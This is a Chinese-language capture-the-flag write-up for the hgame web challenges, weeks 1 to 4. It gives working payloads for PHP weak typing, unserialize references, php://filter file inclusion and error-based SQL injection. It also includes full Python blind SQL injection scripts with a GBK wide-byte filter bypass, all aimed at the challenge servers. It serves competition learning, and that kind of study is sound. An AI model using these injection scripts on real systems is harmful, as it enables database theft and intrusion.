hgame week周
Feb 22, 2018 09:54 · 621 words · 3 minute read
年终于过完了。
week1
Are you from Europe?
查看源码,得到一串加密的js,解密后得到flag
hgame{Th3_Ch0seN_0nE!}
special number
题目给出源码,可以想到 PHP 中的弱类型比较 0 == "任意字符串"。json_decode 函数在处理数字时不会做额外处理,正则里又限制有字母,于是可联想到 0e4564654654。payload:
http://118.25.18.223:10001/?key=0e4564654654
hgame{pHp_w34k_typing_s000_e4sy}
can u find me?
提示robot,查看robots.txt,发现f1aaaaaaaag.php文件,访问,又提示只有admin才可以查看,于是抓包将user改为admin即可。
hgame{78e01ee77a39ef4e}
tell me what you want
逐项修改请求头(User-Agent、Cookie、X-Forwarded-For、Referer)和请求体,最终的数据包如下:
POST /index.php HTTP/1.1
Host: 123.206.203.108:10001
User-Agent: please use Icefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Cookie: isadmin=1
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
referer: www.google.com
want=flag
hgame{For9e_hTTp_iS_N0T_HArd}
我们不一样
PHP 弱类型比较:strcmp() 函数在比较一个数组和一个字符串时会返回 null。payload:
http://118.25.18.223:10002/index.php
post:
str1=jshdka&str2[]=sjdak
hgame{g3t_f14g_is_so0000_ez}
week2
Random?
提示用 vim 编辑过文件,还说网不好,于是尝试备份文件泄露,得到源码:
<?php
// Challenge source recovered from the leaked backup file.
error_reporting(0);
include ('flag.php');
// Plain data holder. Both properties are overwritten below, so the only thing
// the request controls is the *internal structure* of the object.
class emmm
{
var $public;
var $secret;
}
if ($_GET['emmm']) {
// unserialize() on request-controlled input: the serialized form decides the
// object's layout, including PHP references between its properties. A data
// format without object/reference semantics (e.g. json_decode) would not
// offer that handle.
$emmm = unserialize($_GET['emmm']);
if (!is_object($emmm)) {
die("error");
}
// Two independent draws from 0..100000000: practically never equal ...
$emmm->public = random_int(0, 100000000);
$emmm->secret = random_int(0, 100000000);
// ... unless `public` is a reference to `secret` (the R:2 entry in the
// serialized payload), in which case the second assignment writes through
// to both properties and the loose comparison always succeeds.
if ($emmm->public == $emmm->secret) {
echo $flag;
}
}
#highlight_file(__FILE__);
?>
南邮 CTF 里的反序列化题出过这个,构造数据:
// Build the payload: declare the same class shape as the target, then make
// `public` a reference to `secret` before serializing. The reference is
// what survives the round trip, not the property values.
class emmm
{
    public $public;
    public $secret;
}
$obj = new emmm();
$obj->public = &$obj->secret;
// Prints: O:4:"emmm":2:{s:6:"public";N;s:6:"secret";R:2;}
echo serialize($obj);
$emmm->public=&$emmm->secret; 是让两个属性引用同一个变量(指向同一个地址),因此之后对 secret 的赋值也会改变 public,两次 random_int 的结果必然相等。
hgame{&_Is_wondeRful!@#}
草莓社区-1
http://118.25.18.223:10011/show_maopian.php?mao=../flag.php
hgame{#Ma0_pi4n_haO_k4n_ma#}
草莓社区-2
点开发现url是这样的
http://118.25.18.223:10012/show_maopian.php?mao=2.jpg
感觉是文件包含,payload
http://118.25.18.223:10012/show_maopian.php?mao=php://filter/read=convert.base64-encode/resource=../flag.php
F12查看源码,得到flag
hgame{!m4o_pi4n_ChaO_hao_kan!}
最简单的sql题
万能密码即可
hgame{@s0ng_fen_ti@}
week3
正常的SQLi
题目有源码泄露。index.php.bak
<?php
.....
// Cookie value is client-controlled; base64 only obscures it, it is not validation.
$username = base64_decode($_COOKIE['name']);
.....
// Direct interpolation of $username into the query text: the SQL injection sink.
// The fix is a prepared statement (mysqli_prepare + bind_param), not escaping.
$sql = "select * from user where username = '{$username}'";
$re = mysqli_query($conn, $sql);
$rs = mysqli_fetch_array($re);
// echo $rs['flag'];
// The query result is never shown, so the only observable channel left is a
// side effect such as response time. The decoded value is also echoed
// without htmlspecialchars().
echo $username . '<br/>';
echo "因为出题人太懒了,所以现在没有任何功能";
.....
时间盲注脚本
import base64
import requests
def url(payload):
    """Send one probe with *payload* in the ``name`` cookie.

    The target base64-decodes that cookie and interpolates it into a SQL
    string, so the whole probe rides in this single header.  Nothing is
    returned: the caller only cares whether the request raised, and the
    4-second client timeout is what turns a server-side ``sleep(5)`` into
    an exception.
    """
    target = "http://123.206.203.108:10010/normalSQLi/index.php"
    cookie_header = 'name=' + str(payload) + '; isadmin=0'
    requests.post(target, headers={'Cookie': cookie_header}, timeout=4)
def tryy(payload):
    """Return 1 if the probe raised (timed out), otherwise 0."""
    try:
        url(payload)
    except Exception:
        return 1
    return 0
flag = ''
# Binary search on each character position. The injected condition makes
# the server sleep 5 s when the real byte is greater than the guess; the
# 4 s client timeout turns that into a 1/0 answer from tryy().
for position in range(1, 70):
    low, high = 0, 255
    while True:
        guess = (low + high) // 2
        # Earlier enumeration stages, kept for reference:
        #pa = "admin' or if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(mid)+",1))>"+str(middle)+"),sleep(5),0) # "
        #pa = "admin' or if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='user'),"+str(mid)+",1))>"+str(middle)+"),sleep(5),0) # "
        condition = "admin' or if((ascii(mid((select group_concat(flag) from user)," + str(position) + ",1))>" + str(guess) + "),sleep(5),0) # "
        # The cookie is base64 on the wire because the server decodes it first.
        encoded = str(base64.b64encode(condition.encode('utf-8')), 'utf-8')
        slept = tryy(encoded)
        if slept == 1:
            low = guess
        elif slept == 0:
            high = guess
        if low + 1 == high:
            flag += chr(high)
            print(flag)
            break
print(flag)
这里有一个自己以前没注意的小细节,导致在爆列名时一直出错:在使用 if(表达式,sleep(5),0) 时,最好给表达式加上括号(或者在表达式前后加上空格),否则当 where 子句中使用单引号时无法注出数据;但如果 where 后不使用单引号,则不影响注入。即:
#注入正常
pa = "admin' or if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(mid)+",1))>"+str(middle)+",sleep(5),0) # "
#注入正常
pa = "admin' or if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='user'),"+str(mid)+",1))>"+str(middle)+"),sleep(5),0) # "
#注入失败
pa = "admin' or if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='user'),"+str(mid)+",1))>"+str(middle)+",sleep(5),0) # "
flag
hgame{fLag_1s_h4re.....}
送分的SQLi
报错注入 payload
http://118.25.18.223:10068/?id=1 and updatexml(1,concat(0x7e,(select mid(f111aaaggg_w3,10,30) from f111aa4g),0x7e),1); #
hgame{Th3_e4sist_sql_injeCti0n##}
简单的SQLi
添加了MD5截断验证的bool盲注。
import hashlib
import requests
import re
def md5(str1):
    """Return the hex MD5 digest of the UTF-8 encoding of *str1*."""
    digest = hashlib.md5(str1.encode('utf-8'))
    return digest.hexdigest()
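def code_md5(str1):
    """Solve the proof-of-work the target attaches to every response.

    The page embeds a 4-hex-character fragment and expects a ``code`` such
    that ``md5(str(code))[4:8]`` equals it.  Positive integers are tried
    from 1 upward and the first match is returned.

    Args:
        str1: the fragment scraped from the response (coerced with str()).
    Returns:
        int: the smallest positive integer whose digest fragment matches.
    Raises:
        ValueError: if the fragment is not exactly 4 characters long - the
            slice ``[4:8]`` of a digest always is, so such a target could
            never match and the original loop would never terminate.
    """
    target = str(str1)
    if len(target) != 4:
        raise ValueError("expected a 4-character digest fragment, got %r" % target)
    i = 1
    # Unbounded but terminates in practice: 65536 possible fragments.
    while md5(str(i))[4:8] != target:
        i += 1
    return i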
def url(mid, asc, code1):
    """Issue one boolean-blind probe and refresh the global PoW ``code``.

    Asks the target whether the *mid*-th character of the flag column has
    an ASCII value greater than *asc*; *code1* is the proof-of-work answer
    for the previous response.  Every reply carries a new 4-hex fragment
    (matched by ``:="...."``) which is solved with code_md5() and stored in
    the module-level ``code`` so the next call can present it.

    Returns 1 on "query ok", 0 on "query false", and 2 when neither marker
    is in the body.
    """
    global code
    # Earlier enumeration stages, kept for reference:
    #url = "http://118.25.18.223:10086/index.php?id=1\' and ascii(mid((select database()),%s,1))>%s --+&code=%s"%(mid,asc,code1) #week3_sqli1
    #url = "http://118.25.18.223:10086/index.php?id=1\' and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),%s,1))>%s --+&code=%s"%(mid,asc,code1) #users,w3_fllllllll4ag
    #url = "http://118.25.18.223:10086/index.php?id=1\' and ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='w3_fllllllll4ag'),%s,1))>%s --+&code=%s"%(mid,asc,code1) #dajiangyoude,haishijiangyou,f111144g_w3_sqli1
    query = (
        "http://118.25.18.223:10086/index.php?id=1\' and ascii(mid((select group_concat(f111144g_w3_sqli1) from w3_fllllllll4ag),%s,1))>%s --+&code=%s"
        % (mid, asc, code1)
    )
    # Session cookie tied to the challenge instance the script was run against.
    session = {"PHPSESSID": "0cecc18815650852c2f7e718a3d5bff9"}
    body = requests.get(query, cookies=session).text
    # First match is the PoW fragment; an IndexError here means the page
    # layout (or the session) changed.
    fragments = re.findall(':="(.*)"', body)
    code = code_md5(fragments[0])
    if "query false" in body:
        return 0
    return 1 if "query ok" in body else 2
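flag = ''
# The very first request carries a dummy proof-of-work; url() replaces the
# global with a solved one from each response before the next call.
code = 'sdsd'
for mid in range(1, 50):
    low, high = 0, 255
    while True:
        middle = (low + high) // 2
        # One probe per step. The original issued the identical probe twice
        # (once per `if`), doubling the traffic and the PoW work for no gain.
        verdict = url(mid, str(middle), code)
        if verdict == 1:
            low = middle
        elif verdict == 0:
            high = middle
        else:
            # Neither marker in the page: repeating the same probe would loop
            # forever, so fail loudly instead.
            raise RuntimeError("unexpected response at position %d" % mid)
        if low + 1 == high:
            flag += chr(high)
            print(flag)
            break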
hgame{sql_Injection_s000oo_fun}
week4
又双叒叕是SQLI
通过 index.php~ 拿到源码:
<?php
error_reporting(0);
include("sql.php");
// Blacklist WAF: one case-insensitive regex over the raw parameter. It blocks
// the literal space and the = < > comparison operators, but not newlines
// (%0a) and not LIKE - exactly what the blind script further down uses.
// Blacklists are bypassable by construction and are no substitute for a
// parameterized query.
$waf="/(sleep|benchmark|union|group by|=|>|<|hex| |lower|strcmp|updatexml|xmlelement|extractvalue|concat|bin|sleep|mid\(|substr|left|ascii|\/\*|\*\/)/i";
if(isset($_GET['user'])){
if(preg_match_all($waf,$_GET['user'])!=0){
// A hit silently degrades to the admin user instead of rejecting the request.
$user="admin";
}else{
// Hand-rolled escaping: only the single quote is handled, byte-wise, with
// no knowledge of the connection charset selected below.
$user = str_replace("'","\'",$_GET['user']);
}
//echo $user."<br>";
$sqli = new mysqli($host,$username,$passwd,$database);
// With a GBK connection a lead byte such as 0xDF pairs with the inserted
// backslash (0x5C) into a single two-byte character, so the escape is
// swallowed and the following quote terminates the string - the %df%27
// prefix seen in the payloads below. mysqli_real_escape_string() after
// set_charset(), or better a prepared statement, does not have this flaw.
$sqli->set_charset("gbk");
$query="select * from users where username='".$user."'";
$result = $sqli->query($query);
//echo $sqli->error;
$num=0;
@$num = $result->num_rows;
// Matching rows are echoed verbatim: the true/false oracle for a blind probe.
if($num>0){
while($row = $result->fetch_row()){
echo $row[0]." ".$row[1]." ".$row[2]."<br>";
}
}
}
?>
盲注脚本
import requests
import string
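url = 'http://118.25.18.223:10088/?user='
# Candidate alphabet for the next character. `_` and `%` are LIKE wildcards,
# so the `_` candidate would match *any* character; it sits near the end of
# the string and therefore only wins after every literal candidate failed.
# LIKE may also be case-insensitive depending on collation - TODO confirm;
# if so, lowercase letters (tried first) shadow their uppercase twins.
test = "0123456789" + string.ascii_letters + "!@#$^&*(){}=+`~_|"
# payload = '%%df%%27 or (select database() like \"%s%%\")'%(test)
# #payload = ' or (select database() like %s%% )'%(test)
# print(payload)
flag = ''
for _ in range(1, 50):
    for candidate in test:
        # Earlier enumeration stages, kept for reference:
        #payload = '%%df%%27%%0aor%%0a(select%%0adatabase()%%0alike%%0a\"%s%%\")%%23'%(flag+x) # week44sqliii
        #payload = '%%df%%27%%0aor%%0a((select%%0atable_name%%0afrom%%0ainformation_schema.tables%%0awhere%%0atable_schema%%0alike%%0adatabase()%%0alimit%%0a0,1)%%0alike%%0a\"%s%%\")%%23'%(flag+x) #flllllag,users
        #payload = '%%df%%27%%0aor%%0a((select%%0acolumn_name%%0afrom%%0ainformation_schema.columns%%0awhere%%0atable_name%%0alike%%0a"flllllag"%%0alimit%%0a1,1)%%0alike%%0a\"%s%%\")%%23'%(flag+x) #notflag,thisisflag
        # %%0a stands in for the blocked space; %%df%%27 is the wide-byte quote.
        payload = '%%df%%27%%0aor%%0a((select%%0athisisflag%%0afrom%%0aflllllag%%0alimit%%0a0,1)%%0alike%%0a\"%s%%\")%%23' % (flag + candidate)
        r = requests.get(url + payload)
        # '998' is presumably part of the row echoed when the condition holds
        # - verify against the target's output.
        if '998' in r.text:
            flag += candidate
            print(flag)
            break
    else:
        # No candidate extended the prefix: the value is complete or contains
        # a character outside `test`. The original kept re-probing the same
        # position for the remaining iterations; stop instead.
        break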
一个小知识点
使用宽字节进行盲注时,如果 where 语句中比较的字段是字符型,只能使用 or,不能使用 and:因为使用 and 时,判断依据是前面的语句是否查出内容;如果字段是字符型,宽字节的 %df 也会参与字符串比较,所以即使闭合了单引号也查不出东西;但如果字段是 int 类型,就可以查出内容,因为 mysql 在比较时如果被比较的内容不是整型,会自动将其转换为整型,即 1a=1 是成立的。
select * from hgame where name='admin<0xdf>\' order by 1#'  -- name 为 varchar 类型则查不出内容,如果是 int 类型就可以